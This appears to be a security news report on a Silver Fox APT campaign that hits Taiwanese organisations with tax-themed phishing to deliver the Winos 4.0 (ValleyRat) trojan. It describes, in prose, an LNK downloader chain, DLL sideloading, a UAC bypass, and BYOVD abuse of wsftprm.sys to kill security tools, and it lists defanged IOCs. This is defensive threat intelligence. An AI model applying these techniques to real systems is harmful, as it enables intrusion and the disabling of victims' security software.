Silver Fox APT is running a new wave of targeted attacks in Taiwan that combine DLL sideloading and Bring Your Own Vulnerable Driver (BYOVD) techniques to deploy Winos 4.0 (ValleyRat) while aggressively disabling security tools.
The campaigns rely on highly localized tax and e‑invoice lures and fast‑changing infrastructure, making them difficult to block with static indicators alone.
Emails and download pages mimic official tax audit notices, e‑invoice portals, and tax filing installers, tricking users into opening weaponized archives or clicking embedded links.
In the first campaign, victims receive a RAR archive named “taxIs_RX3001.rar,” which contains a benign decoy document and a malicious LNK shortcut.
FortiGuard Labs recently documented several phishing campaigns that impersonate Taiwan’s tax authorities and related financial services to target local organizations.
The LNK uses a relative path to launch cmd.exe and runs a chain of obfuscated commands that creates a working directory under %Public%501, copies the legitimate curl.exe to url.exe for masquerading, and then downloads a payload named Setup64.exe from attacker‑controlled infrastructure (bqdrzbyq[.]cn).
The downloaded installer, presented as a 64‑bit “special edition” package, extracts an embedded executable resource (“EXPAND”) into C:ProgramDataGolden, forming the base for later deployment of Winos 4.0 and its driver component.
DLL Sideloading and Infrastructure
A second campaign shifts from LNK‑based downloaders to DLL sideloading via legitimate Taiwanese applications distributed in tax- or e-invoice-themed archives.
Phishing links such as hxxp://taxfnat[.]tw/ and fake e‑invoice URLs are used to redirect victims to China‑hosted cloud storage (tos-cn-shanghai.volces[.]com), where E‑Invoice.rar archives contain both a trusted executable and a malicious DLL.
When the user runs the legitimate‑looking tax application, it sideloads the attacker’s DLL, which in turn deploys the same driver‑based evasion and Winos 4.0 backdoor used in the initial LNK campaign and connects to a shared C2 address.
Analysis of the DLL’s PDB path shows an internal project name “大馬專案(二),” and related samples reference another tax application used for sideloading, with the C2 later moving to 154[.]91.64.246.
Domain registration data for these and earlier tax‑themed operations shows recurring patterns in registrant identity and reuse of the same Winos 4.0 C2 (47[.]76[.]86[.]151) across campaigns dating back to early 2026, reinforcing attribution to a focused Silver Fox subgroup.
The final payload is Winos 4.0 (also known as ValleyRat), a Gh0st‑derived remote access trojan widely associated with Silver Fox operations.
Before enabling its core features, the malware checks for administrative rights and, if necessary, elevates privileges using a UAC bypass that abuses the AppInfo service and trusted system binaries to avoid user prompts.
It then launches a BYOVD sequence that loads a vulnerable, validly signed kernel driver, wsftprm.sys (Topaz OFD / Topaz Antifraud), by resolving native APIs such as NtLoadDriver and RtlAdjustPrivilege directly from ntdll.dll.
The vulnerable wsftprm.The sys driver is known to allow low‑privileged code to kill Protected Process Light (PPL) processes, including Microsoft Defender security agents, via crafted IOCTL calls.
After gaining kernel privileges, Winos 4.0 iterates over running processes and terminates an extensive list of security products from vendors such as Microsoft, Trend Micro, Symantec, HuoRong, 360, and others, ensuring a clean environment for persistence and remote control.
C2, Plugin Architecture, and Attribution
Winos 4.0 hides its C2 address 47[.]76[.]86[.]151 using Base64‑encoded configuration data and only connects after confirming the victim’s system version.
Once online, it retrieves an “online module” DLL and additional plugins, including file management, multiple screen‑capture variants, and system management components, some of which are stored directly in the registry to support fileless, memory‑resident execution.
Previous reporting has shown that such Winos ValleyRat modules keystrokes, capture screenshots, read clipboard contents, and harvest data from applications such as online banking and messaging platforms.
Infrastructure links, reuse of the Winos 4.0/ValleyRat codebase, and overlaps in driver abuse and project identifiers all align with prior Silver Fox APT activity targeting Taiwan and other Asian regions.
For defenders, this campaign underscores the need to monitor for DLL sideloading behavior, block vulnerable drivers like wsftprm.sys, and treat unsolicited tax‑ or invoice‑related archives and links as high‑risk, especially when they originate from non‑verified sources.
IOCs
IP Address
| IP Address | Description |
|---|---|
| 47[.]76[.]86[.]151 | Likely hosting malicious payloads or redirect domains |
Domain Indicators
| Domain | TLD | Notes |
|---|---|---|
| bqdrzbyq[.]cn | .cn | Suspicious Chinese domain |
| taxfnat[.]tw | .tw | Taiwan-based phishing-style naming |
| njhwuyklw[.]com | .com | Likely random-generated |
| twtaxgo[.]cn | .cn | Used in malicious URL |
| taxhub[.]tw | .tw | Impersonates tax-related service |
| taukeny[.]com | .com | Randomized domain structure |
| taxpro[.]tw | .tw | Taiwanese tax-themed naming |
| lmaxjuyh[.]cn | .cn | Possible command-and-control domain |
| tkooyvff[.]cn | .cn | Suspicious structure |
| etaxtw[.]cn | .cn | Mimics legitimate Taiwanese tax system |
| twswsb[.]cn | .cn | Obfuscated hostname |
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
